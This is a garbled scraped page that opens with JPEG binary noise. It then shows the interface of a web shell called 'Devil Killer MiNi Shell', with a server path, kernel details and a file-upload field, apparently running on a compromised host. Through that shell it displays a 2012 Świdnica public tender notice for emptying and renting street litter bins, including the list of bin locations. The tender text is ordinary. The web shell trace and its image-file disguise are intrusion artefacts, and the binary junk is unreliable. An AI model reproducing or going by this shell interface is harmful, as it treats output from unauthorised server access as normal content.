JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120418/123106-N-2012.html

<p class="kh_header"><b>Świdnica: Opróżnianie koszy ulicznych na terenie miasta Świdnica wraz z wynajmem koszy</b><br>
<b>Numer ogłoszenia: 123106 - 2012; data zamieszczenia: 18.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opróżnianie koszy ulicznych na terenie miasta Świdnica wraz z wynajmem koszy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2 Przedmiot zamówienia:
3.2.1 Ustawienie na terenie miasta Świdnica 377 szt. jednakowych koszy ulicznych stanowiących własność Wykonawcy o pojemności minimum 35 litrów, maksimum 50 litrów.  Systematyczne (nie dopuszczające do przepełnienia kosza) opróżnianie 377 koszy ulicznych i wywóz zebranych odpadów komunalnych. Utrzymanie koszy we właściwym stanie technicznym i estetycznym wyglądzie.
3.2.2  Systematyczne (nie dopuszczające do przepełnienia kosza) opróżnianie 113 szt. koszy ulicznych zamontowanych trwale do podłoża o pojemności od 50 do 80 litrów stanowiących własność Zamawiającego i wywóz zebranych odpadów komunalnych. Utrzymywanie koszy we właściwym stanie technicznym (w tym niezwłoczne wykonywanie drobnych napraw)  i estetycznym wyglądzie. 
3.2.3  Lokalizacja koszy: ciągi piesze (chodniki, place) oraz parkingi

ROZDZIAŁ 23   SZCZEGOŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA                        
23.1 Do zadań Wykonawcy należy:
23.1.1 Ustawienie na terenie miasta Świdnica 377 jednakowych koszy ulicznych stanowiących własność Wykonawcy o pojemności minimum 35 litrów, maksimum  50 litrów. Systematyczne (nie dopuszczające do przepełnienia kosza) opróżnianie 377 koszy ulicznych stanowiących własność Wykonawcy wraz z wywozem zebranych odpadów komunalnych. Wykaz miejsc ustawienia koszy  Wykonawcy wraz z podaną ilością koszy zawiera rozdział 24  SIWZ pkt. 1. 
23.1.2  Systematyczne (nie dopuszczające do przepełnienia kosza) opróżnianie 113 szt. koszy ulicznych  zamontowanych trwale do podłoża  o pojemności od 50 do 80 litrów stanowiących własność Zamawiającego wraz z  wywozem zebranych odpadów komunalnych. Wykaz  lokalizacji koszy Zamawiającego wraz z podaną ilością koszy i ich pojemnością zawiera rozdział 24 SIWZ  pkt. 2.
23.1.3  Utrzymywanie estetycznego wyglądu koszy, które obejmuje usuwanie zabrudzeń koszy  oraz mycie całych koszy według potrzeb. Terminy wykonania prac w zakresie mycia koszy winny być uzgodnione z Zamawiającym.
23.1.4  Utrzymywanie  we właściwym stanie technicznym koszy Wykonawcy,
23.1.5 Utrzymywanie we właściwym stanie technicznym koszy Zamawiającego, w tym  niezwłoczne wykonywanie drobnych  napraw np.
 - zamontowanie wyrwanego kosza (z podłożem lub bez podłoża),
 - wyprostowanie przechylonego kosza,
 - naprawa zawiasów (np. od urwanej pokrywy),
 - uzupełnienie kołków mocujących,
 - ułożenie kostki betonowej lub granitowej (w przypadku wyrwania kosza z podłożem),
23.1.6  Usuwanie nieczystości wokół koszy w promieniu 3 m od kosza.
Wykonawca będzie usuwał w promieniu 3 m od kosza nieczystości w postaci niedopałków papierosów, papierów i resztek żywności oraz inne, które nie zostały wrzucone przez przechodniów do kosza lub wypadły z kosza.
23.1.7  Wymiana zniszczonych koszy  stanowiących własność Wykonawcy na nowe kosze tego samego typu.
23.1.8  Prowadzenie ewidencji zbieranych odpadów i przekazywanie odpadów na podstawie karty przekazania odpadów.
23.1.9 Przestawianie koszy ulicznych będących własnością Wykonawcy i Zamawiającego w przypadku zaistnienia takiej konieczności (wniosek mieszkańców, prace remontowe lub budowlane itp.)
23.1.10  Informowanie w formie pisemnej Zamawiającego o ewentualnych uszkodzeniach i zniszczeniach koszy lub innych nieprawidłowościach występujących w trakcie realizacji zamówienia.
23.1.11  Opróżnianie koszy  w przedziale czasu od godz. 6.00 do godz. 14.00  z  zastrzeżeniem, że kosze  zlokalizowane w strefie centralnej miasta (Rynek, Łukowa, Długa, Kotlarska, Pułaskiego, Grodzka, Franciszkańska, Daleka, Środkowa, Trybunalska , Bohaterów Getta, Pl. Grunwaldzki, Wałbrzyska do przejazdu kolejowego) powinny być opróżniane do godz. 9.00  natomiast kosze zlokalizowane poza terenem strefy centralnej do godz. 14.00.
23.1.12. W przypadku zgłoszenia przez Zamawiającego lub Straż Miejską faktu przewrócenia kosza i zalegania wokół niego nieczystości w godzinach opróżniania (od godz. 6.00 do godz. 14.00) Wykonawca ma obowiązek ustawić kosz i usunąć nieczystości w promieniu 3 m od kosza w ciągu 3 godzin od zgłoszenia.
23.1.13 W przypadku zgłoszenia przez Zamawiającego lub Straż Miejską faktu przewrócenia kosza i zalegania wokół niego nieczystości poza godzinami opróżniania (od godz.14.00 do godz. 6.00 dnia następnego) Wykonawca ma obowiązek ustawić kosz  i usunąć nieczystości w promieniu 3 m od kosza  w ciągu:
- 6 godzin od zgłoszenia w dni robocze (od poniedziałku do piątku) 
- 12 godzin od zgłoszenia w soboty, niedziele i święta.
23.1.14  W przypadku zaistnienia okoliczności uniemożliwiających wykonanie usługi zgodnie z zapisami umowy Wykonawca jest zobowiązany zawiadomić o tym fakcie Zamawiającego lub Straż Miejską (poza godzinami pracy Urzędu Miejskiego) podając jednocześnie nowy termin wykonania usługi.       
23.1.15 Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt. 22 ustawy z dnia 27.04.2001r. o odpadach (tekst jednolity Dz.U. nr 185 z 2010 r. poz.1243 z późn. zmianami) ma obowiązek gospodarowania powstałymi podczas realizacji zadania odpadami zgodnie z ustawą o odpadach oraz ustawą  z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2005 r. Nr 236, poz. 2008 z późniejszymi zmianami)
23.1.16 Wykonawca zobowiązany  jest przedłożyć informację o wytwarzanych odpadach (w tym również o odpadach biodegradowanych) i sposobach gospodarowania nimi do Departamentu Infrastruktury Miasta Urzędu Miejskiego w Świdnicy.

ROZDZIAŁ 24  WYKAZ MIEJSC USTAWIENIA KOSZY ULICZNYCH NA TERENIE MIASTA ŚWIDNICA
                                                                                                        
1.Wykaz miejsc ustawienia koszy Wykonawcy                                  Ilość koszy
1) ul. Kościelna  -  III Liceum Ogólnokształcące 				szt. 3
2) ul. Kościelna 5							szt. 1
3)  ul. Kościelna 18							szt. 1 
4) ul. 1-go Maja 21						szt. 1
5) ul. 1-go Maja - po stronie skarpy, naprzeciwko Carrefour		szt. 2
6) ul. 1-go Maja 1							szt. 1
7) ul. 1-go Maja 27						szt. 1
8) ul. 1-go Maja 2                                                                              	szt. 1
9) ul. 1-go Maja - przy ogrodzeniu placu zabaw				szt. 1
10) ul.1-go Maja 9 						szt. 1 
11) skrzyżowanie1 Maja -Wrocławska - po stronie skarpy		szt. 1 
12) skrzyżowanie Paderewskiego-Kościuszki - przy ciągu pieszym	szt. 2
13) Pl. Grunwaldzki- przed MDH					szt. 4
14) Pl. Grunwaldzki - koło schronu				  	szt. 1
15) Pl. Grunwaldzki - koło Poczty					szt. 1
16) ul. Nauczycielska - po stronie Domu Nauczyciela  			szt. 1
17) ul. Nauczycielska - po stronie MDK				szt. 1
18) ul. Nauczycielska - po stronie wieży ciśnień				szt. 1
19) ul. Of. Oświęcimskich- koło Przedszkola				szt. 1
20) ul. Of Oświęcimskich 22						szt. 1
21) ul. Of. Oświęcimskich 16						szt. 1
22) ul. Of. Oświęcimskich 4						szt. 1
23) ul. Of. Oświęcimskich 5						szt. 1
24) ul. Of. Oświęcimskich 8						szt. 1
25) ul. Of. Oświęcimskich 49						szt. 1
26) ul. Of. Oświęcimskich - koło marketu ALDI				szt. 2
27) ul. Jagiellońska 1	                                                                szt. 1
28) ul. Jagiellońska 11						szt. 1
29) ul. Jagiellońska 15						szt. 1
30) ul. Jagiellońska 12						szt. 1
31) ul. Jagiellońska  20 						szt. 1
32) ul. Zamkowa - u zbiegu ulic Zamkowa-Basztowa			szt. 1
33) ul. Zamkowa - koło Sp-ni Nowe Zycie				szt. 1
34) ul. Zamkowa- po stronie Kościoła Zielonoświątkowego		szt. 1 
35) ul. Żeromskiego- trójkąt - przejście dla pieszych			szt. 2
36) ul. Żeromskiego 3	szt. 1                                           
37) ul. Żeromskiego  13						szt. 1
38) ul. Żeromskiego 28 						szt. 1 
39) ul. Żeromskiego 40 						szt. 1
40) ul. Żeromskiego - po stronie składu opałowego			szt. 1
41) ul. Żeromskiego - po stronie posesji Muzealna 4			szt. 1 
42) ul. Komunardów 9						szt. 1
43) ul. Komunardów - koło sprzętu medycznego				szt. 1 
46) ul. Rzeźnicza- chodnik po prawej stronie 
od Wrocławskiej do Mieszka						szt. 1
47) Pl. Drzymały - wzdłuż terenu zielonego				szt. 3
48) ul. Dębowa 2							szt. 1
49) ul. Dębowa 12 							szt. 1
50) ul. Dębowa 26							szt. 1
51) ul. Klonowa w pobliżu Biedronki					szt. 2
52) ul. Klonowa - po stronie ogródków 				szt. 2 
53 ) ul. Okrężna 2							szt. 2
54) ul. Okrężna 13 a						szt. 1
55) ul. Okrężna 21							szt. 1
56) ul. Okrężna 48 							szt. 1
57) ul. Okrężna (koło piekarni)					szt. 1
58) ul. Okrężna - vis a vis budynku nr 62				szt. 1
59) ul. Okrężna 74							szt. 1
60) ul. Miłego Dnia - po stronie firmy Forpol 				szt. 2 
61) ul. Jodłowa 17							szt. 1
62) ul. Jodłowa 21 - Gimnazjum nr 4					szt. 2
62) ul. Jodłowa 23							szt. 1
63) ul. Jodłowa 38 - wjazd na teren hurtowni 				szt. 1
64) ul Kliczkowska - w pobliżu przychodni Ar- vita			szt. 1
65) ul. Kliczkowska - w pobliżu budynku nr 28				szt. 1
66) ul. Kliczkowska - w pobliżu budynku nr 18				szt. 1
67) ul. Kliczkowska - w pobliżu budynku nr 24 				szt. 1
68) ul. Kliczkowska - w pobliżu budynku nr 15				szt. 1
69) ul. Kliczkowska - w pobliżu budynku nr 23				szt. 1
70) ul. Kliczkowska - Wyższa Szkoła Teleinformatyczna 			szt. 2
71) ul. Równa - na wysokości basenu krytego				szt. 1 
72 ) ul. Równa 11 - II Liceum Ogólnokształcące				szt. 2
73) ul. Równa 14							szt. 1
74) ul. Równa - w pobliżu budynku nr 8				szt. 1
75) ul. Równa - na wysokości Galerii Świdnickiej				szt. 2
76) ul. Zygmuntowska 1						szt. 1
77) ul. Zygmuntowska 2						szt. 1
78) Pl. Św. Małgorzaty - w pobliżu skrzyż. z Chrobrego			szt. 1
79) ul. Konopnickiej - na wysokości przychodni				szt. 1
80) ul. Konopnickiej - przy ogrodzeniu Przedszkola 
koło parkometru 							szt. 1
81) ul. Konopnickiej - na wysokości parkingu				szt. 1
82) ul. Konopnickiej - po stronie biblioteki				szt. 1
83) ul. Konopnickiej - przy ogrodzeniu placu zabaw			szt. 1 
84)  ul. Długa 33-35						szt. 1
85)  ul. Długa 45a							szt. 1
86) ul. Długa 60 							szt. 1
87) ul. A. Krajowej- od Oświęcimskiej do Okulickiego			szt. 1
88) ul. A. Krajowej - od Okulickiego do Inwalidów Wojennych		szt. 1
89) ul. A. Krajowej - od Inwalidów Wojennych do Niecałej 		szt. 3
90) ul. A. Krajowej - od Niecałej do Wałbrzyskiej
- prawa strona drogi						szt. 3
91) ul. A. Krajowej - od Niecałej do Wałbrzyskiej 
- lewa strona drogi							szt. 4
92) róg Długiej i Klasztornej	 					szt. 1
93) ul. Trybunalska 1						szt. 1
94) róg Trybunalskiej i Spółdzielczej	 				szt. 1 
95) ul. Środkowa 1							szt. 1
96) ul. Środkowa 4							szt. 1
97) ul. Środkowa 7							szt. 1
98) ul. Środkowa 8							szt. 1
99) ul. Spółdzielcza - po stronie zieleńca 				szt. 1
100) ul. Spółdzielcza - parking					szt. 2
101) ul. Spółdzielcza  9						szt. 1
102) ul. Spółdzielcza 14						szt. 1
103) ul. Spółdzielcza - po stronie Caritas				szt. 1
104) ul. M. Kunic 2 						szt. 2
105) ul. M.Kunic 6							szt. 1
106) ul. M.Kunic 1-9						szt. 2
107) ul. Kolejowa - od Wałbrzyskiej do Spacerowej - lewa str.		szt. 8
108) ul. Spacerowa - przystanek					szt. 1
109) ul. Kolejowa 17						szt. 1
110 ) ul. Kolejowa - po stronie PKP					szt. 1
111) ul. Sikorskiego 1						szt. 1
112) ul. Sikorskiego 7  						szt. 1
113) ul. Sikorskiego 15						szt. 1
114) ul. Sikorskiego 29			szt. 1                                       
115) ul. Sikorskiego 33					szt. 1 
116) ul. Bracka 3						szt. 1
117) ul. Bracka 6	 					szt. 1
118) ul. Daleka - róg Dalekiej i Pułaskiego	szt. 1                                        
119) ul. Daleka - w pobliżu sklepu 1001 Drobiazgów	szt. 1
120) ul. Mennicka - w pobliżu budynku Mennicka 3	szt. 1
121) ul. Siostrzana - koło Towarzystwa Ubezpieczeniowego szt. 1
122) ul. Siostrzana - koło sklepu Campus	szt. 1
123) ul. Siostrzana 2					szt. 1
124) ul. Siostrzana 10					szt. 1
125) ul. Teatralna - koło parkometru				szt. 1
126) ul. Teatralna 14					szt. 1
127) ul. Boh. Getta 21					szt. 1
128) ul. Saperów - przy drodze do Gimnazjum nr 3			szt. 1
129) ul. Saperów - chodnik przy parku					szt. 4  
130) ul. Saperów - w pobliżu budynku nr 3				szt. 1 
131) ul. Saperów - w pobliżu budynku nr 16				szt. 1
132 ul. Saperów 27 - Szkoła Podstawowa nr 11 				szt. 3
133) ul. Pobożnego- ciąg pieszy od Łokietka do  K.Wielkiego		szt. 3
134)  skrzyżowanie Pobożnego-Łukasińskiego - chodnik po 
stronie garaży							szt. 1
135) K. Wielkiego - chodnik naprzeciwko Stokrotki			szt. 2
136) skrzyżowanie K.Wielkiego-Stęczyńskiego - chodnik
koło kamiennej tablicy ZPORR					szt. 1
137. Stęczyńskiego - chodnik od ronda do Zmorskiego			szt. 2
138) skrzyżowanie Stęczyńskiego-Łukasińskiego -chodnik
po stronie parkingu							szt. 1 
139) ul. Polna Droga - parking				szt. 4	
140) ul. Sprzymierzeńców - chodniki przy parkach			szt. 2
141) ul. Sprzymierzeńców - w pobliżu Seminarium			szt. 1
142) ul. Sprzymierzeńców - w pobliżu budynku Wyspiańskiego 1		szt. 1 
143 ) ul. Sprzymierzeńców - w pobliżu  Zakładu Poprawczego		szt. 1 
144) ul. Łukasińskiego - przy parkach - chodnik				szt. 2
145) ul. Łukasinskiego - w pobliżu Krętej				szt. 1 
146) ul. Łukasińskiego 1						szt. 1
147) ul. Łukasińskiego 7						szt. 1
148) ul. Łukasińskiego 13			szt. 1                                     
149) ul. Łukasińskiego 2						szt. 1
150) ul. Łukasińskiego - koło sklepu EKO				szt. 1
151) ul. Łukasińskiego - koło Pafal					szt. 1
152) ul. Kanonierska - przy parku ciąg chodnika				szt. 3
153) ul. Traugutta - chodnik przy parku				szt. 3
154) ul. Traugutta - w pobliżu budynku nr 8				szt. 1
155) ul. Traugutta - po stronie Zakładu Wulkanizacyjnego		szt. 1 
156) ul. Gdyńska - chodnik przy parku					szt. 2
157) skrzyżowanie Gdyńska-Parkowa - przy parku		szt. 1             
158) ul. Parkowa - od Saperów do Gdyńskiej - prawa strona drogi		szt. 2 
159) ul. Parkowa - od Saperów do Gdyńskiej - lewa strona drogi		szt. 1  160) ul. Ks. Agnieszki 2 - Zespół Szkół Ekonomicznych 			szt. 2
161) ul. Ks. Agnieszki - w pobliżu Domu Parafii 				szt. 1 
162) ul. Ks. Agnieszki - po stronie budynków 7-9 			szt. 1
163) ul. Śląska - przy obiektach OSIR					szt. 4
164) ul. Mieszka - chodnik od Wodnej do Równej - lewa strona drogi szt. 4
165) ul. Mieszka -  chodnik od Rzeżniczej do Wodnej - lewa strona drogi	szt. 3
166) ul. Głowackiego - przy Urzędzie Gminy				szt. 2
167) ul. Głowackiego- przy budynku nr 10, 14, 22                               	szt. 3
168) ul. Okulickiego + parking przed Starostwem Powiatowym		szt. 4
169) ul. Okulickiego - koło Firmy Eltex			szt. 1
170) ul. Okulickiego - wjazd od Skłodowskiej				szt. 2
171) ul. Okulickiego 10						szt. 1
172) ul. Okulickiego 20						szt. 1
173) ul. Dworcowa							szt. 5
174) ul. Przemysłowa ( od Kopernika do Metalowców )			szt. 4
175) ul. Riedla - chodnik po prawej stronie od Zamenhofa
        do Słobódzkiego						szt. 1
176) ul. Wyszyńskiego - ciąg pieszy od Słobódzkiego
         do Waryńskiego - prawa strona drogi				szt. 4
177)  ul. Wyszyńskiego- ciąg pieszy od Słobódzkiego
       do Waryńskiego - lewa strona drogi				szt. 3 
178) ul. Wyszyńskiego - ciąg pieszy od Prądzyńskiego
         do Dąbrowskiego - prawa str. drogi				szt. 1
179) ul. Wyszyńskiego - promenada - przed kościołem		szt. 4        
180)  ul. M. Skłodowskiej -naprzeciwko pawilonu Intermarche		szt. 3
181)  Komorowskiego - w pobliżu skrzyżowania z ul. Skłodowskiej		szt. 1
182) ul. Lelewela - strona parzysta i nieparzysta		szt. 5
183)  ul. Wrocławska 4						szt. 1
184) ul. Wrocławska 3 - koło salonu meblowego		  		szt. 1
185) ul. Wrocławska - koło budynku ŚPWIK				szt. 1
186) ul. Wrocławska 24						szt. 1
187) ul. Wrocławska 23						szt. 1
188) ul. Wrocławska 31						szt. 1
189) ul. Wrocławska - w pobliżu budynku 41				szt. 1
190) ul. Wrocławska 44						szt. 1
191) ul. Wrocławska 38						szt. 1
192) ul. Wrocławska 52 - w pobliżu Apteki				szt. 1
193) ul. Wrocławska 57						szt. 1
194)  ul. Wrocławska - skarpa-ciąg chodnika do Pl. Wolności		szt. 3
195)  Al. Niepodległości - ciąg od Młyna do Garbarskiej 	 		szt. 2
196) Al. Niepodległości - ciąg chodnika przy Placu Wojska Polskiego		szt. 1
197) Al. Niepodległości 4						szt. 1
198) Al. Niepodległości 3						szt. 1
199) Al. Niepodległości 14						szt. 1
200)  Al. Niepodległości 7 						szt. 1
201) Al. Niepodległości - po stronie Aresztu				szt. 2 
202) Al. Niepodległości - koło Szkoły Muzycznej				szt. 1
203) Al. Niepodległości - po stronie muru Katedry			szt. 2
204) ul. Westerplatte 4						szt. 1
205) ul.Westerplatte - w pobliżu budynku nr 8				szt. 1
206) ul. Westerplatte 20						szt. 1
207) ul. Westerplatte - naprzeciwko Dolmeb				szt. 1 
208)  ul.Westerplatte 16						szt. 1
209) ul. Westerplatte 13						szt. 1
210) ul.Westerplatte 21						szt. 1
211) ul. Westerplatte 29						szt. 1
212) ul. Westerplatte 37						szt. 1
213) ul. Westerplatte - na wysokości firmy Forpol			szt. 1
214) ul. Westerplatte - w pobliżu parkingu				szt. 2
215) ul. Westerplatte - koło Szpitala					szt. 1
216) ul. Westerplatte - koło budynku 56b				szt. 1
217) ul. Westerplatte 58						szt. 1
218) ul. Westerplatte - w pobliżu sklepu Belpol			szt. 1
219) ul. Westerplatte - w pobliżu Galerii Świdnickiej			szt. 3
220) ul. Westerplatte - parking koło Brata Alberta			szt. 1
221) ul. Wałbrzyska -od Głowackiego do budynku nr 14 			szt. 2
222) ul. Wałbrzyska - w pobliżu budynku 31				szt. 1 
223) ul. Wałbrzyska - w pobliżu zieleńca Polna Droga			szt. 2 
224) ul. Wałbrzyska - koło Przedszkola					szt. 1
225) ul.Wałbrzyska 54- koło Szkoły Cech Rzemiosł Różnych		szt. 1
226) ul. Wałbrzyska - koło Stacji Sanitarno- Epidemiologicznej		szt. 1  
227) ul. Wałbrzyska - po stronie parku					szt. 1
228)  ul. Wałbrzyska 7 					szt. 1
229) ul. Wałbrzyska 6					szt. 1
230) ul. Wałbrzyska - Zespół Szkół Budowlano - Elektrycznych		szt. 2
231) ul. Wałbrzyska - Szkoła Podstawowa nr 8 				szt. 2
232) ul. Zamenhofa - od Kunic do Sikorskiego - lewa str. drogi		szt. 4
233) ul. Zamenhofa - chodnik od wyjazdu z parkingu 
Przychodni do budynku nr 5						szt. 2  
234) ul. Zamenhofa 3a 						szt. 1
235) ul. Zamenhofa - przy ławkach po stronie pawilonów			szt. 3
236) ul. Zamenhofa - w pobliżu Przychodni				szt. 3
237) ul. Pionierów - od Wałbrzyskiej do Sprzymierzeńców 
- po stronie parku							szt. 2
238) ul. Pionierów - I Liceum Ogólnokształcące				szt. 2
239) ul. Pionierów - od Sprzymierzeńców do Śląskiej - prawa strona drogi	szt. 1
240) ul. Pionierów- od Sprzymierzeńców do Śląskiej - lewa strona drogi	szt. 1 
241). ul. Kwiatowa - po stronie Przedszkola				szt. 1 
242)  ul. Waryńskiego - ciąg pieszy do Marcinkowskiego			szt. 3
243) Pl. Wolności - przed Apteką 					szt. 2
244) ul. Garbarska - po stronie muru					szt. 1
245)  ul. Rolnicza - po stronie Kościoła 				szt. 1
246). ul. Kraszowicka - koło szkoły					szt. 2
247) ul. Ks. Jadwigi Śląskiej - koło pawilonów handlowych		szt. 2 
248) PL. Wojska Polskiego 3-  Szkoła Podstawowa nr 3 			szt. 3
249) ul. Marcinkowskiego 4 - Szkoła Podstawowa nr 4 			szt. 2
250) ul. Wodna 5 - Szkoła Podstawowa nr 6				szt. 2
251) ul. Kozara Słobódzkiego - Gimnazjum nr 1				szt. 2
252) ul. Kozara Słobódzkiego - w pobliżu żłobka  			szt. 1
252)  ul. 8-go Maja - Szkoła Muzyczna 				szt. 1
Razem                                                                                           szt. 377 
2. Wykaz  lokalizacji koszy ulicznych Zamawiającego zamontowanych trwale do podłoża   
Ilość koszy, pojemność kosza
1) ul. Pułaskiego 					szt. 11	(poj. 80 l)
2)  Rynek						szt. 18 	(poj. 80 l)
3) ul. Armii Krajowej (Urząd Miejski)			szt.  2 (poj. 80 l)
4) ul. Armii Krajowej (Urząd Miejski )			szt.  1  (poj. 50 l)
5) ul. Kościelna - w pobliżu Kościoła Pokoju	         	szt. 2 (poj. 80 l)
6) ul. Grodzka					szt. 6 ( poj. 80 l )
7) ul. Kotlarska 					szt. 8 ( poj. 80 l )
8) Pl. Grunwaldzki					szt. 3 ( poj. 80 l ) 
9) ul. Długa 					szt. 6 ( poj. 80 l )
10) ul. Franciszkańska 				szt. 4 ( poj. 80 l )
11) ul.  Bohaterów Getta				szt. 7 ( poj. 80 l )
12) ul. Komunardów				szt. 12 ( poj. 50 l )
13) ul. Żeromskiego ( między Kotlarską
a Pl. Grunwaldzkim )				szt. 3 ( poj. 80 l )
14) ul. Chrobrego					szt. 2 ( poj. 80 l )
15) ul. Muzealna 					szt. 4 ( poj. 80 l )
16) ul. Głowackiego - w pobliżu Biedronki		szt.  4 (poj. 50 l )
17) ul. Jagiellońska 2				szt. 1 ( poj. 50 l )
18) ul. Konopnickiej - koło postoju koło Taxi		szt. 1 ( poj. 50 l ) 
19) skrzyżowanie Pl. Św. Małgorzaty-1 Maja		szt. 1 ( poj. 50 l )
20)  skrzyżowanie Jagiellońska-Chrobrego		szt. 1 ( poj. 50 l )
21) skrzyżowanie Konopnickiej-Pl. Św. Małgorzaty	szt. 1 ( poj. 50 l )
22) ul. Łukowa 					szt. 7 ( poj. 50 l )
